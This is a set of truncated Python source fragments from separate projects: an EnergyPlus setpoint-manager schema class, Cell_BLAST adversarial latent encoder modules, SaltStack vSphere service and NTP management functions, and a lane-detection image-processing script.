'pyname': u'maximum_setpoint_temperature',
'default': 99.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'C'}),
(u'minimum setpoint humidity ratio',
{'name': u'Minimum Setpoint Humidity Ratio',
'pyname': u'minimum_setpoint_humidity_ratio',
'default': 1e-05,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'kgWater/kgDryAir'}),
(u'maximum setpoint humidity ratio',
{'name': u'Maximum Setpoint Humidity Ratio',
'pyname': u'maximum_setpoint_humidity_ratio',
'default': 1.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'kgWater/kgDryAir'}),
(u'reference setpoint node name',
{'name': u'Reference Setpoint Node Name',
'pyname': u'reference_setpoint_node_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'mixed air stream node name',
{'name': u'Mixed Air Stream Node Name',
'pyname': u'mixed_air_stream_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'outdoor air stream node name',
{'name': u'Outdoor Air Stream Node Name',
'pyname': u'outdoor_air_stream_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'return air stream node name',
{'name': u'Return Air Stream Node Name',
'pyname': u'return_air_stream_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'setpoint node or nodelist name',
{'name': u'Setpoint Node or NodeList Name',
'pyname': u'setpoint_node_or_nodelist_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'})]),
'format': None,
'group': u'Setpoint Managers',
'min-fields': 11,
'name': u'SetpointManager:OutdoorAirPretreat',
'pyname': u'SetpointManagerOutdoorAirPretreat',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def control_variable(self):
"""field `Control Variable`
Args:
value (str): value for IDD Field `Control Variable`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `control_variable` or None if not set
"""
return self["Control Variable"]
@control_variable.setter
def control_variable(self, value=None):
"""Corresponds to IDD field `Control Variable`"""
self["Control Variable"] = value
@property
def minimum_setpoint_temperature(self):
"""field `Minimum Setpoint Temperature`
| Applicable only if Control variable is Temperature
| Units: C
| Default value: -99.0
Args:
value (float): value for IDD Field `Minimum Setpoint Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_setpoint_temperature` or None if not set
"""
return self["Minimum Setpoint Temperature"]
@minimum_setpoint_temperature.setter
def minimum_setpoint_temperature(self, value=-99.0):
"""Corresponds to IDD field `Minimum Setpoint Temperature`"""
self["Minimum Setpoint Temperature"] = value
@property
def maximum_setpoint_temperature(self):
"""field `Maximum Setpoint Temperature`
| Applicable only if Control variable is Temperature
| Units: C
| Default value: 99.0
Args:
value (float): value for IDD Field `Maximum Setpoint Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `maximum_setpoint_temperature` or None if not set
"""
return self["Maximum Setpoint Temperature"]
@maximum_setpoint_temperature.setter
def maximum_setpoint_temperature(self, value=99.0):
"""Corresponds to IDD field `Maximum Setpoint Temperature`"""
self["Maximum Setpoint Temperature"] = value
@property
def minimum_setpoint_humidity_ratio(self):
"""field `Minimum Setpoint Humidity Ratio`
| Applicable only if Control variable is
| MaximumHumidityRatio, MinimumHumidityRatio, or HumidityRatio - then minimum is 0.00001
| Units: kgWater/kgDryAir
| Default value: 1e-05
| value <= 1.0
Args:
value (float): value for IDD Field `Minimum Setpoint Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_setpoint_humidity_ratio` or None if not set
"""
return self["Minimum Setpoint Humidity Ratio"]
@minimum_setpoint_humidity_ratio.setter
def minimum_setpoint_humidity_ratio(self, value=1e-05):
"""Corresponds to IDD field `Minimum Setpoint Humidity Ratio`"""
self["Minimum Setpoint Humidity Ratio"] = value
@property
def maximum_setpoint_humidity_ratio(self):
"""field `Maximum Setpoint Humidity Ratio`
| Applicable only if Control variable is
| MaximumHumidityRatio, MinimumHumidityRatio, or HumidityRatio - then minimum is 0.00001
| Units: kgWater/kgDryAir
| Default value: 1.0
| value <= 1.0
Args:
value (float): value for IDD Field `Maximum Setpoint Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `maximum_setpoint_humidity_ratio` or None if not set
"""
return self["Maximum Setpoint Humidity Ratio"]
@maximum_setpoint_humidity_ratio.setter
def maximum_setpoint_humidity_ratio(self, value=1.0):
"""Corresponds to IDD field | |
<reponame>gao-lab/Cell_BLAST
r"""
Latent space / encoder modules for DIRECTi
"""
import typing
import abc
import numpy as np
import sklearn.metrics
import tensorflow as tf
from . import module, nn, utils
class Latent(module.Module):
r"""
Abstract base class for latent variable modules.
"""
def __init__(
self, latent_dim: int, h_dim: int = 128, depth: int = 1,
dropout: float = 0.0, lambda_reg: float = 0.0,
fine_tune: bool = False, deviation_reg: float = 0.0,
name: str = "Latent"
) -> None:
super(Latent, self).__init__(name=name)
self.latent_dim = latent_dim
self.h_dim = h_dim
self.depth = depth
self.dropout = dropout
self.lambda_reg = lambda_reg
self.fine_tune = fine_tune
self.deviation_reg = deviation_reg
self.deviation_regularizer = \
(lambda x: self.deviation_reg * tf.reduce_mean(tf.square(x))) \
if self.fine_tune and self.deviation_reg > 0 else None
@abc.abstractmethod
def _build_latent(
self, x: tf.Tensor, training_flag: tf.Tensor,
scope: str = "encoder"
) -> tf.Tensor: # pragma: no cover
raise NotImplementedError
@abc.abstractmethod
def _build_regularizer(
self, training_flag: tf.Tensor, epoch: tf.Tensor,
scope: str = "regularizer"
) -> tf.Tensor: # pragma: no cover
raise NotImplementedError
def __bool__(self) -> bool:
return True
def _get_config(self) -> typing.Mapping:
return {
"latent_dim": self.latent_dim,
"h_dim": self.h_dim,
"depth": self.depth,
"dropout": self.dropout,
"lambda_reg": self.lambda_reg,
"fine_tune": self.fine_tune,
"deviation_reg": self.deviation_reg,
**super(Latent, self)._get_config()
}
class Gau(Latent):
r"""
Build a Gaussian latent module. The Gaussian latent variable is used as
cell embedding.
Parameters
----------
latent_dim
Dimensionality of the latent variable.
h_dim
Dimensionality of the hidden layers in the encoder MLP.
depth
Number of hidden layers in the encoder MLP.
dropout
Dropout rate.
lambda_reg
Regularization strength on the latent variable.
name
Name of the module.
"""
def __init__(
self, latent_dim: int, h_dim: int = 128, depth: int = 1,
dropout: float = 0.0, lambda_reg: float = 0.001,
fine_tune: bool = False, deviation_reg: float = 0.0,
name: str = "Gau"
) -> None:
super(Gau, self).__init__(latent_dim, h_dim, depth, dropout, lambda_reg,
fine_tune, deviation_reg, name)
def _build_latent(
self, x: tf.Tensor, training_flag: tf.Tensor,
scope: str = "encoder"
) -> tf.Tensor:
self.build_latent_scope = f"{scope}/{self.scope_safe_name}"
with tf.variable_scope(self.build_latent_scope):
dense_kwargs = [dict(
deviation_regularizer=self.deviation_regularizer
)] * self.depth
if dense_kwargs:
dense_kwargs[0]["weights_trainable"] = not self.fine_tune
ptr = nn.mlp(
x, [self.h_dim] * self.depth,
dropout=self.dropout, batch_normalization=True,
dense_kwargs=dense_kwargs, training_flag=training_flag
)
self.gau = tf.identity(nn.dense(
ptr, self.latent_dim,
deviation_regularizer=self.deviation_regularizer
), name="gau")
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_latent_scope)
return self.gau
def _build_regularizer(
self, training_flag: tf.Tensor, epoch: tf.Tensor,
scope: str = "discriminator"
) -> tf.Tensor:
self.gaup_sampler = tf.distributions.Normal(loc=0.0, scale=1.0)
self.build_regularizer_scope = f"{scope}/{self.scope_safe_name}"
with tf.variable_scope(self.build_regularizer_scope, reuse=tf.AUTO_REUSE):
self.gaup = self.gaup_sampler.sample((
tf.shape(self.gau)[0], self.latent_dim))
dropout = np.zeros(self.depth)
dropout[1:] = self.dropout # No dropout for first layer
gau_pred = tf.sigmoid(nn.dense(nn.mlp(
self.gau, [self.h_dim] * self.depth,
dropout=dropout.tolist(), training_flag=training_flag
), 1), name="pred")
gaup_pred = tf.sigmoid(nn.dense(nn.mlp(
self.gaup, [self.h_dim] * self.depth,
dropout=dropout.tolist(), training_flag=training_flag
), 1), name="prior_pred")
self.gau_d_loss, self.gau_g_loss = nn.gan_loss(gaup_pred, gau_pred)
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.gau_d_loss)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.gau_g_loss)
return self.lambda_reg * self.gau_g_loss
def _compile(self, optimizer: str, lr: float) -> None:
with tf.variable_scope(f"optimize/{self.scope_safe_name}"):
optimizer = getattr(tf.train, optimizer)
self.step = optimizer(lr).minimize(
self.lambda_reg * self.gau_d_loss,
var_list=tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES,
self.build_regularizer_scope
)
)
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, self.step)
class CatGau(Latent):
r"""
Build a double latent module, with a continuous Gaussian latent variable
and a one-hot categorical latent variable for intrinsic clustering of
the data. These two latent variabels are then combined into a single
cell embedding vector.
Parameters
----------
latent_dim
Dimensionality of the Gaussian latent variable.
cat_dim
Number of intrinsic clusters.
h_dim
Dimensionality of the hidden layers in the encoder MLP.
depth
Number of hidden layers in the encoder MLP.
dropout
Dropout rate.
multiclass_adversarial
Whether to use multi-class adversarial regularization on the
Gaussian latent variable.
Setting this to True makes each intrinsic cluster more Gaussian-like.
cat_merge
Whether to enable heuristic cluster merging during training.
min_silhouette
Minimal average silhouette score below which intrinsic clusters will be
merged.
patience
Execute heuristic cluster merging under a "fast-ring" early stop
mechanism, with early stop patience specified by this argument.
lambda_reg
Regularization strength on the latent variables.
name
Name of the module.
"""
def __init__(
self, latent_dim: int, cat_dim: int,
h_dim: int = 128, depth: int = 1, dropout: float = 0.0,
multiclass_adversarial: bool = False, cat_merge: bool = False,
min_silhouette: float = 0.0, patience: int = 10,
lambda_reg: float = 0.001, fine_tune: bool = False,
deviation_reg: float = 0.0, name="CatGau"
) -> None:
super(CatGau, self).__init__(latent_dim, h_dim, depth, dropout,
lambda_reg, fine_tune, deviation_reg, name)
self.cat_dim = cat_dim
self.multiclass_adversarial = multiclass_adversarial
self.min_silhouette = min_silhouette
self.patience = patience
self.cat_merge = cat_merge
if cat_merge:
self.on_epoch_end.append(self._cat_merge)
def _build_latent(
self, x: tf.Tensor, training_flag: tf.Tensor,
scope: str = "encoder"
) -> tf.Tensor:
self.build_latent_scope = f"{scope}/{self.scope_safe_name}"
with tf.variable_scope(self.build_latent_scope):
dense_kwargs = [dict(
deviation_regularizer=self.deviation_regularizer
)] * self.depth
if dense_kwargs: # Fix the first layer
dense_kwargs[0]["weights_trainable"] = not self.fine_tune
ptr = nn.mlp(
x, [self.h_dim] * self.depth,
dropout=self.dropout, batch_normalization=True,
dense_kwargs=dense_kwargs,
training_flag=training_flag
)
with tf.variable_scope("cat"):
self.cat_logit = tf.identity(nn.dense(
ptr, self.cat_dim,
deviation_regularizer=self.deviation_regularizer
), name="cat_logit")
self.cat = tf.nn.softmax(self.cat_logit, name="cat")
with tf.variable_scope("gau"):
self.gau = tf.identity(nn.dense(
ptr, self.latent_dim,
deviation_regularizer=self.deviation_regularizer
), name="gau")
self.latent = self.gau + nn.dense(
self.cat, self.latent_dim, use_bias=False,
weights_initializer=tf.random_normal_initializer(stddev=0.1),
deviation_regularizer=self.deviation_regularizer,
scope="cluster_head"
)
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_latent_scope)
return self.latent
def _build_regularizer(
self, training_flag: tf.Tensor, epoch: tf.Tensor,
scope: str = "discriminator"
) -> tf.Tensor:
self.catp_mask = tf.get_variable(
"catp_mask", initializer=np.ones(self.cat_dim), trainable=False)
self.vars_to_save.append(self.catp_mask)
self.catp_sampler = tf.distributions.Categorical(
probs=self.catp_mask / tf.reduce_sum(self.catp_mask))
self.gaup_sampler = tf.distributions.Normal(loc=0.0, scale=1.0)
if self.multiclass_adversarial:
return self._build_multiclass_regularizer(training_flag, scope)
return self._build_binary_regularizer(training_flag, scope)
def _build_binary_regularizer(
self, training_flag: tf.Tensor, scope: str = "discriminator"
) -> tf.Tensor:
self.build_regularizer_scope = f"{scope}/{self.scope_safe_name}"
with tf.variable_scope(self.build_regularizer_scope, reuse=tf.AUTO_REUSE):
with tf.variable_scope("cat"):
self.catp = tf.one_hot(
self.catp_sampler.sample(tf.shape(self.cat)[0]),
depth=self.cat_dim
)
dropout = np.zeros(self.depth)
dropout[1:] = self.dropout # No dropout for first layer
cat_pred = tf.sigmoid(nn.dense(nn.mlp(
self.cat, [self.h_dim] * self.depth,
dropout=dropout.tolist(), training_flag=training_flag
), 1), name="pred")
catp_pred = tf.sigmoid(nn.dense(nn.mlp(
self.catp, [self.h_dim] * self.depth,
dropout=dropout.tolist(), training_flag=training_flag
), 1), name="prior_pred")
self.cat_d_loss, self.cat_g_loss = \
nn.gan_loss(catp_pred, cat_pred)
with tf.variable_scope("gau"):
self.gaup = self.gaup_sampler.sample((
tf.shape(self.gau)[0], self.latent_dim))
dropout = np.zeros(self.depth)
dropout[1:] = self.dropout # No dropout for first layer
gau_pred = tf.sigmoid(nn.dense(nn.mlp(
self.gau, [self.h_dim] * self.depth,
dropout=dropout.tolist(), training_flag=training_flag
), 1), name="pred")
gaup_pred = tf.sigmoid(nn.dense(nn.mlp(
self.gaup, [self.h_dim] * self.depth,
dropout=dropout.tolist(), training_flag=training_flag
), 1), name="prior_pred")
self.gau_d_loss, self.gau_g_loss = \
nn.gan_loss(gaup_pred, gau_pred)
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.cat_d_loss)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.cat_g_loss)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.gau_d_loss)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.gau_g_loss)
return self.lambda_reg * (self.cat_g_loss + self.gau_g_loss)
def _build_multiclass_regularizer(
self, training_flag: tf.Tensor, scope: str = "discriminator"
) -> tf.Tensor:
self.build_regularizer_scope = f"{scope}/{self.scope_safe_name}"
with tf.variable_scope(self.build_regularizer_scope, reuse=tf.AUTO_REUSE):
with tf.variable_scope("cat"):
self.catp = tf.one_hot(
self.catp_sampler.sample(tf.shape(self.cat)[0]),
depth=self.cat_dim
)
dropout = np.zeros(self.depth)
dropout[1:] = self.dropout # No dropout for first layer
cat_pred = tf.sigmoid(nn.dense(nn.mlp(
self.cat, [self.h_dim] * self.depth,
dropout=dropout.tolist(), training_flag=training_flag
), 1), name="pred")
catp_pred = tf.sigmoid(nn.dense(nn.mlp(
self.catp, [self.h_dim] * self.depth,
dropout=dropout.tolist(), training_flag=training_flag
), 1), name="prior_pred")
self.cat_d_loss, self.cat_g_loss = \
nn.gan_loss(catp_pred, cat_pred)
with tf.variable_scope("gau"):
self.gaup = self.gaup_sampler.sample((
tf.shape(self.gau)[0], self.latent_dim))
dropout = np.zeros(self.depth)
dropout[1:] = self.dropout # No dropout for first layer
gau_logits = nn.dense(nn.mlp(
self.gau, [self.h_dim] * self.depth,
dropout=dropout.tolist(), training_flag=training_flag
), self.cat_dim + 1)
gaup_logits = nn.dense(nn.mlp(
self.gaup, [self.h_dim] * self.depth,
dropout=dropout.tolist(), training_flag=training_flag
), self.cat_dim + 1)
true = tf.concat([
tf.concat([
self.cat,
tf.zeros((tf.shape(self.cat)[0], 1))
], axis=1),
tf.concat([
tf.zeros((tf.shape(gaup_logits)[0], self.cat_dim)),
tf.ones((tf.shape(gaup_logits)[0], 1))
], axis=1)
], axis=0)
logits = tf.concat([gau_logits, gaup_logits], axis=0)
self.gau_d_loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits_v2(
labels=tf.stop_gradient(true), logits=logits,
), name="d_loss"
)
self.gau_g_loss = tf.negative(self.gau_d_loss, name="g_loss")
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.cat_d_loss)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.cat_g_loss)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.gau_d_loss)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.gau_g_loss)
return self.lambda_reg * (self.cat_g_loss + self.gau_g_loss)
def _compile(self, optimizer: str, lr: float) -> None:
with tf.variable_scope(f"optimize/{self.scope_safe_name}"):
optimizer = getattr(tf.train, optimizer)
self.step = optimizer(lr).minimize(
self.lambda_reg * (self.cat_d_loss + self.gau_d_loss),
var_list=tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES,
self.build_regularizer_scope
)
)
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, self.step)
# On epoch end heuristic
def _cat_merge(
self, model: "directi.DIRECTi",
train_data_dict: utils.DataDict,
val_data_dict: utils.DataDict, # pylint: disable=unused-argument
loss: tf.Tensor
) -> bool:
# Initialization
if "_cat_merge_dict" not in dir(self):
self._cat_merge_dict = {
"record": np.inf,
"countdown": self.patience,
"converged": False
}
d = self._cat_merge_dict
# Guard operatability
if model.sess.run(self.catp_mask).sum() == 1:
d["converged"] = True
return d["converged"]
# Guard entrance
if loss < d["record"]:
d["record"] = loss
d["countdown"] = self.patience
else:
d["countdown"] -= 1
# Entrance
if d["countdown"] == 0:
removed_clusters = set(np.where(
model.sess.run(self.catp_mask) == 0
)[0])
# Identify cluster heads that are not assigned any samples
cluster = model._fetch(
self.cat, train_data_dict
).argmax(axis=1).astype(np.int)
population = np.eye(self.cat_dim)[cluster, :].sum(axis=0)
remove_idx = set(np.where(
population <= 1
)[0]).difference(removed_clusters)
reason = "emptyness"
# Identify clusters that are not clearly separated
if not remove_idx:
latent = model._fetch(self.latent, train_data_dict)
if train_data_dict.size > 10000:
subsample_idx = model.random_state.choice(
train_data_dict.size, 10000, | |
'*' vsphere.ntp_configure my.vcenter.location root bad-password '[192.168.3.11, 172.16.17.32]' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
'''
service_instance = salt.utils.vmware.get_service_instance(host=host,
username=username,
password=password,
protocol=protocol,
port=port)
if not isinstance(ntp_servers, list):
raise CommandExecutionError('\'ntp_servers\' must be a list.')
# Get NTP Config Object from ntp_servers
ntp_config = vim.HostNtpConfig(server=ntp_servers)
# Get DateTimeConfig object from ntp_config
date_config = vim.HostDateTimeConfig(ntpConfig=ntp_config)
host_names = _check_hosts(service_instance, host, host_names)
ret = {}
for host_name in host_names:
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
date_time_manager = _get_date_time_mgr(host_ref)
log.debug('Configuring NTP Servers \'{0}\' for host \'{1}\'.'.format(ntp_servers, host_name))
try:
date_time_manager.UpdateDateTimeConfig(config=date_config)
except vim.fault.HostConfigFault as err:
msg = 'vsphere.ntp_configure_servers failed: {0}'.format(err)
log.debug(msg)
ret.update({host_name: {'Error': msg}})
continue
ret.update({host_name: {'NTP Servers': ntp_config}})
return ret
@depends(HAS_PYVMOMI)
@ignores_kwargs('credstore')
def service_start(host,
username,
password,
service_name,
protocol=None,
port=None,
host_names=None):
'''
Start the named service for the given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The <PASSWORD> host.
service_name
The name of the service for which to set the policy. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to start the service.
If host_names is not provided, the service will be started for the ``host``
location instead. This is useful for when service instance connection information
is used for a single ESXi host.
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.service_start my.esxi.host root bad-password '<PASSWORD>'
# Used for connecting to a vCenter Server
salt '*' vsphere.service_start my.vcenter.location root bad-password '<PASSWORD>' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
'''
service_instance = salt.utils.vmware.get_service_instance(host=host,
username=username,
password=password,
protocol=protocol,
port=port)
host_names = _check_hosts(service_instance, host, host_names)
valid_services = ['DCUI', 'TSM', 'SSH', 'ssh', 'lbtd', 'lsassd', 'lwiod', 'netlogond',
'ntpd', 'sfcbd-watchdog', 'snmpd', 'vprobed', 'vpxa', 'xorg']
ret = {}
# Don't require users to know that VMware lists the ssh service as TSM-SSH
if service_name == 'SSH' or service_name == 'ssh':
temp_service_name = 'TSM-SSH'
else:
temp_service_name = service_name
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update({host_name: {'Error': '{0} is not a valid service name.'.format(service_name)}})
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
service_manager = _get_service_manager(host_ref)
log.debug('Starting the \'{0}\' service on {1}.'.format(service_name, host_name))
# Start the service
try:
service_manager.StartService(id=temp_service_name)
except vim.fault.HostConfigFault as err:
msg = '\'vsphere.service_start\' failed for host {0}: {1}'.format(host_name, err)
log.debug(msg)
ret.update({host_name: {'Error': msg}})
continue
# Some services are restricted by the vSphere License Level.
except vim.fault.RestrictedVersion as err:
log.debug(err)
ret.update({host_name: {'Error': err}})
continue
ret.update({host_name: {'Service Started': True}})
return ret
@depends(HAS_PYVMOMI)
@ignores_kwargs('credstore')
def service_stop(host,
username,
password,
service_name,
protocol=None,
port=None,
host_names=None):
'''
Stop the named service for the given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The <PASSWORD> to <PASSWORD> to the host.
service_name
The name of the service for which to set the policy. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to stop the service.
If host_names is not provided, the service will be stopped for the ``host``
location instead. This is useful for when service instance connection information
is used for a single ESXi host.
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.service_stop my.esxi.host root bad-password 'ssh'
# Used for connecting to a vCenter Server
salt '*' vsphere.service_stop my.vcenter.location root bad-password 'ssh' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
'''
service_instance = salt.utils.vmware.get_service_instance(host=host,
username=username,
password=password,
protocol=protocol,
port=port)
host_names = _check_hosts(service_instance, host, host_names)
valid_services = ['DCUI', 'TSM', 'SSH', 'ssh', 'lbtd', 'lsassd', 'lwiod', 'netlogond',
'ntpd', 'sfcbd-watchdog', 'snmpd', 'vprobed', 'vpxa', 'xorg']
ret = {}
# Don't require users to know that VMware lists the ssh service as TSM-SSH
if service_name == 'SSH' or service_name == 'ssh':
temp_service_name = 'TSM-SSH'
else:
temp_service_name = service_name
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update({host_name: {'Error': '{0} is not a valid service name.'.format(service_name)}})
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
service_manager = _get_service_manager(host_ref)
log.debug('Stopping the \'{0}\' service on {1}.'.format(service_name, host_name))
# Stop the service.
try:
service_manager.StopService(id=temp_service_name)
except vim.fault.HostConfigFault as err:
msg = '\'vsphere.service_stop\' failed for host {0}: {1}'.format(host_name, err)
log.debug(msg)
ret.update({host_name: {'Error': msg}})
continue
# Some services are restricted by the vSphere License Level.
except vim.fault.RestrictedVersion as err:
log.debug(err)
ret.update({host_name: {'Error': err}})
continue
ret.update({host_name: {'Service Stopped': True}})
return ret
@depends(HAS_PYVMOMI)
@ignores_kwargs('credstore')
def service_restart(host,
username,
password,
service_name,
protocol=None,
port=None,
host_names=None):
'''
Restart the named service for the given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The password used to login to the host.
service_name
The name of the service for which to set the policy. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to restart the service.
If host_names is not provided, the service will be restarted for the ``host``
location instead. This is useful for when service instance connection information
is used for a single ESXi host.
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.service_restart my.esxi.host root bad-password '<PASSWORD>'
# Used for connecting to a vCenter Server
salt '*' vsphere.service_restart my.vcenter.location root bad-password '<PASSWORD>' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
'''
service_instance = salt.utils.vmware.get_service_instance(host=host,
username=username,
password=password,
protocol=protocol,
port=port)
host_names = _check_hosts(service_instance, host, host_names)
valid_services = ['DCUI', 'TSM', 'SSH', 'ssh', 'lbtd', 'lsassd', 'lwiod', 'netlogond',
'ntpd', 'sfcbd-watchdog', 'snmpd', 'vprobed', 'vpxa', 'xorg']
ret = {}
# Don't require users to know that VMware lists the ssh service as TSM-SSH
if service_name == 'SSH' or service_name == 'ssh':
temp_service_name = 'TSM-SSH'
else:
temp_service_name = service_name
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update({host_name: {'Error': '{0} is not a valid service name.'.format(service_name)}})
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
service_manager = _get_service_manager(host_ref)
log.debug('Restarting the \'{0}\' service on {1}.'.format(service_name, host_name))
# Restart the service.
try:
service_manager.RestartService(id=temp_service_name)
except vim.fault.HostConfigFault as err:
msg = '\'vsphere.service_restart\' failed for host {0}: {1}'.format(host_name, err)
log.debug(msg)
ret.update({host_name: {'Error': msg}})
continue
# Some services are restricted | |
from moviepy.editor import VideoFileClip
from camera_calibration import camera_calibration
import cv2
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from pipeline import pipeline
ret, mtx, dist, rvecs, tvecs = camera_calibration()
# straight_lines1.jpg
src = np.float32([[209, 719], [1095, 719], [538, 492], [751, 492]])
dst = np.float32([[209, 719], [1095, 719], [209, 0], [1095, 0]])
M1 = cv2.getPerspectiveTransform(src, dst)
Minv1 = cv2.getPerspectiveTransform(dst, src)
# print(M1)
# straight_lines2.jpg
src = np.float32([[228, 719], [1109, 719], [537, 492], [757, 492]])
dst = np.float32([[228, 719], [1109, 719], [228, 0], [1109, 0]])
M2 = cv2.getPerspectiveTransform(src, dst)
Minv2 = cv2.getPerspectiveTransform(dst, src)
# print(M2)
M = (M1 + M2) / 2
Minv = (Minv1 + Minv2) / 2
print(M)
def process_image(img):
img = cv2.undistort(img, mtx, dist, None, mtx)
threshed = pipeline(img)
height, width, channels = img.shape
binary_warped = cv2.warpPerspective(threshed, M, (width, height), flags=cv2.INTER_LINEAR)
# Assuming you have created a warped binary image called "binary_warped"
# Take a histogram of the bottom half of the image
histogram = np.sum(binary_warped[binary_warped.shape[0] // 2:, :], axis=0)
# Create an output image to draw on and visualize the result
out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
# Find the peak of the left and right halves of the histogram
# These will be the starting point for the left and right lines
midpoint = np.int(histogram.shape[0] // 2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
# Choose the number of sliding windows
nwindows = 9
# Set height of windows
window_height = np.int(binary_warped.shape[0] // nwindows)
# Identify the x and y positions of all nonzero pixels in the image
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Current positions to be updated for each window
leftx_current = leftx_base
rightx_current = rightx_base
# Set the width of the windows +/- margin
margin = 100
# Set minimum number of pixels found to recenter window
minpix = 50
# Create empty lists to receive left and right lane pixel indices
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Identify window boundaries in x and y (and right and left)
win_y_low = binary_warped.shape[0] - (window + 1) * window_height
win_y_high = binary_warped.shape[0] - window * window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
# Draw the windows on the visualization image
cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high),
(0, 255, 0), 2)
cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high),
(0, 255, 0), 2)
# Identify the nonzero pixels in x and y within the window
good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &
(nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &
